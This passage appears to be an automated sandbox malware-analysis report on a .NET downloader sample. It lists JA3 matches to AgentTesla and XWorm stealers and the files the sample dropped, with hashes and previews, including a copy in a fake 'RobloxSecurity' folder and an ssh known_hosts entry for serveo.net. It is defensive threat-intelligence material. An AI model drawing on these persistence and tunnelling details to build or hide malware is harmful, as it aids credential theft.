                                                                                                    ESTADO DE CUENTA DHL - 69502.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.95.112.1

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0e17075649093e1f08173f977f56d5a6074cf72a4a48f58106317565a0844aab156446d6e86e172.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 149.154.167.220
                                                                                                    87645345.vbsGet hashmaliciousXWormBrowse
                                                                                                    • 149.154.167.220
                                                                                                    96874650.vbsGet hashmaliciousXWormBrowse
                                                                                                    • 149.154.167.220
                                                                                                    AlPDAGITIM F#U0130YAT TEKL#U0130F _PER 001 #U2026scanneed 00101.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    SOMGAZ PO NO6200125011.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 149.154.167.220
                                                                                                    751652433.vbsGet hashmaliciousXWormBrowse
                                                                                                    • 149.154.167.220
                                                                                                    387165243.vbsGet hashmaliciousXWormBrowse
                                                                                                    • 149.154.167.220
                                                                                                    DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 149.154.167.220
                                                                                                    182763543.vbsGet hashmaliciousXWormBrowse
                                                                                                    • 149.154.167.220

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vkefq4cv.oil.exe_8bda737a63465ab69884df6bd58af130501f7e94_ea868dc5_2dd495ae-2f75-472c-b3ff-2ce61eb255a3\Report.wer

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.3631329385084094
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fNJVulDnA0Z4V4LSaKUbJlVNe6lZF6zuiFtZ24lO8qU:1JViDbZ4V4LSaJbrWhzuiFtY4lO8qU
                                                                                                    MD5:8DF9BDA50BBE3450B40A752EFDA35970
                                                                                                    SHA1:9087F9B044B5643151B6E880FA1D4662544B872E
                                                                                                    SHA-256:B1554ABADA649C3F418FB4061ECDFA48ED84929AF06F3757DB7AA55203585DB6
                                                                                                    SHA-512:2D2622EE1C7D2AECDA109F88963444C341338281CD6C1384BDFC2ED2A704EBC74622A3EC5CA4416E0E1B830D0AAAC0F7988CED27D4B2A135D283E213354BF175
                                                                                                    Malicious:false
                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.2.7.5.6.8.9.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.3.7.1.0.0.1.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.d.4.9.5.a.e.-.2.f.7.5.-.4.7.2.c.-.b.3.f.f.-.2.c.e.6.1.e.b.2.5.5.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.b.e.8.d.c.3.-.4.6.e.4.-.4.8.7.7.-.b.8.8.e.-.e.8.e.a.c.4.f.4.b.5.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.v.k.e.f.q.4.c.v...o.i.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.b.9.b.8.4.c.f.0.b.e.0.9.9.b.2.6.b.5.d.8.b.d.8.e.f.a.c.0.2.9.1.7.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.1.1.e.6.-.4.8.3.b.3.4.5.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.d.d.9.e.2.6.2.e.9.1.3.a.e.8.a.e.d.4.2.5.1.a.8.a.0.0.5.3.3.0.0.0.0.0.0.0.0.!.0.0.0.0.5.b.4.8.d.3.2.a.c.a.1.f.7.7.0.5.c.0.3.e.2.b.d.

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB81.tmp.dmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 16 streams, Sat Feb 10 15:17:23 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):744738
                                                                                                    Entropy (8bit):2.9709841894198212
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:DnDLp7S/mYF0UhPrxl3ozejFDcN+hHzsZ4oakRPcLRxBzcSMpUNauA1CCq4/ngp6:v2zU+xzaIgE3MpTq4/gp3Qa6+2
                                                                                                    MD5:50CEE141B6A528A99DD4F05900D33751
                                                                                                    SHA1:D0CBEBBBF89C29E411F2D067C6B80E1A5C950BD1
                                                                                                    SHA-256:38F3BFD3A68F925464D525E9A676B382D9B17CD6A48C47C084E28293D0B82ADE
                                                                                                    SHA-512:4563D44FC5DD35B2BB9A9705A1861E698BB6F3544CAD3431704BF8A48873D6FF3CE141D1D7C86763717CDB65DA5B840034C44C86333763E9A60E3FB67BB3F1BB
                                                                                                    Malicious:false
                                                                                                    Preview:MDMP..a..... ..........e.........................%..........<....1...........1......._.."...........l.......8...........T............m..:...........pP..........\R..............................................................................eJ.......R......Lw......................T...........|..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE32.tmp.WERInternalMetadata.xml

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9074
                                                                                                    Entropy (8bit):3.706987583444449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:R6l7wVeJeP9UK6YEfqGgmfZ22VKcJprP89bGbIfiCm:R6lXJe9UK6YECGgmfE2VHEGkfO
                                                                                                    MD5:B7EEBD7DDE9F9346C004426EF7E9285C
                                                                                                    SHA1:BBDC2419A74E5E87623CB49668CB64EF186A8EFB
                                                                                                    SHA-256:720E58F20F931C8990B2E2FC684F254003F95E54CF66E3E6F30D4120E7CEBBC1
                                                                                                    SHA-512:6C32FE678F258B6B3328511509BF3D642901D1AED046B46F773CD9FE1E9DF9FC55BE604182920975B4ABA7D49DD7EE7D2D6A2772F6BA33FFF96696C6FEDAF7FB
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE62.tmp.xml

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4845
                                                                                                    Entropy (8bit):4.480097738711733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsTJg771I9snWpW8VYPYm8M4JEHqHFNIyq8vcHquyDg4Mhudd:uIjftI7vW7VnJHMWPuyDg4Mhwd
                                                                                                    MD5:C6C49753428EC5380CC37E96E3B673D3
                                                                                                    SHA1:0E2ECEB6D5FD08E35AAAEDB57594070504AAC059
                                                                                                    SHA-256:3FF9C8077B9660804B2B607CFBEACD83E8143FE545E83508B4A365EF257A6FEC
                                                                                                    SHA-512:F0AA8DBA794AE193837D5322361461A12609F306E0193F6EFEB03989B9DF3976B21F341A2DFCD04CA8E9CD5AD8C594362244013A673AA534AE6AB889871AA7E9
                                                                                                    Malicious:false
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="187580" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                    C:\Users\user\.ssh\known_hosts

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    File Type:ASCII text, with very long lines (404), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):406
                                                                                                    Entropy (8bit):5.90555968999191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TyFqFcWmedrh+bMcBVM5uUkZq0lbUMO9wHWSSlICnoF/:dmgSbMcBVM5A409Kw1SlIQ+/
                                                                                                    MD5:EC266D309CBAD86B3E4939F2117DFE39
                                                                                                    SHA1:CF12599FBDC167B4C01B518A0BD63D51CD83798B
                                                                                                    SHA-256:2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
                                                                                                    SHA-512:D2D39D9174F459146DE57C205979E7815829C37EAFD214CDCE88F90A961F04E5468290E530CF31B9B621276A86EB3A071BBF3464962E1A8E44A7478794571BAA
                                                                                                    Malicious:false
                                                                                                    Preview:serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj..

                                                                                                    C:\Users\user\AppData\Local\4cn9n9irdf\p.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:CSn:CSn
                                                                                                    MD5:FCF1D8D2F36C0CDE8ECA4B86A8FE1DF8
                                                                                                    SHA1:C7F9B0FB437533FBD302CC7DCA6D68E101ADCE87
                                                                                                    SHA-256:AA522A6BEECBEB04BEAA3F2818524C5FA79D01549B7F330F0CC0DAF925A080EE
                                                                                                    SHA-512:893B79C9DD383A0E024CD278921A99DF9EB60CEDC67C69580518016664BA11829801FF0E8CE87035B3050E616FBEE84D04CABCD4C9D90451D236A481B348E8D5
                                                                                                    Malicious:false
                                                                                                    Preview:6787

                                                                                                    C:\Users\user\AppData\Local\4cn9n9irdf\report.lock

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vkefq4cv.oil.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
                                                                                                    MD5:578A9969E472E71F38254887263D82A4
                                                                                                    SHA1:8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
                                                                                                    SHA-256:AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
                                                                                                    SHA-512:E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1119
                                                                                                    Entropy (8bit):5.345080863654519
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                    MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                    SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                    SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                    SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2240
                                                                                                    Entropy (8bit):5.379131272179432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZWSU4y4RQmFoUeWmfgZ9tK8NPP8m7u1iMugei/ZPUyuE:ZLHyIFKL3IZ2KHVOugsE
                                                                                                    MD5:BAE959C907A8BF1C9DA9D7779AEAB956
                                                                                                    SHA1:7A5EF77FF6B9A251B38EA7284D14F31CE1F72D41
                                                                                                    SHA-256:DB9E2A6D8EF4584F7B714716AA2637B2CFD3B8F55939CFE15B0EE3DAD61D7E80
                                                                                                    SHA-512:362F8BD77889F4C6F1786B88E0AAF095174CCCD831B5BC4886659A6D3DB6693C13E17A97674B0A510A5820CAA0C6C59DD95785089203990961B9DFF9169900C3
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                    C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h200bfl.rmg.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jghiq33d.kjq.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc5dlpdd.are.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt4c2ncj.tfe.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\hahahahaha.txt

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):120
                                                                                                    Entropy (8bit):4.564485170699406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:BOzReCWAMb7iDRVivmiurQlyrWRYAdMKq8QFKxrg5bvn:UaXiDRAYrQlyrKKv6c5bvn
                                                                                                    MD5:E10E8583FFEE40E89FEF7419CC14ADA4
                                                                                                    SHA1:1D97614F6E46CB7B87F96740E9C315931BDAF222
                                                                                                    SHA-256:615581F4791B9D308FDC033455A8E2F22A01CE236C185908652B8B0A93CFF589
                                                                                                    SHA-512:6139701FA1C1B937611500F4875CB000E03FDA04732BA6F7B0BA074E7FA2AFDCC8970A6C326B8754F9E1C87BE56E2DDF1293F957B6EA9C07228E062936B06AAD
                                                                                                    Malicious:false
                                                                                                    Preview:Failed to listen on prefix 'http://127.0.0.1:6787/' because it conflicts with an existing registration on the machine...

                                                                                                    C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
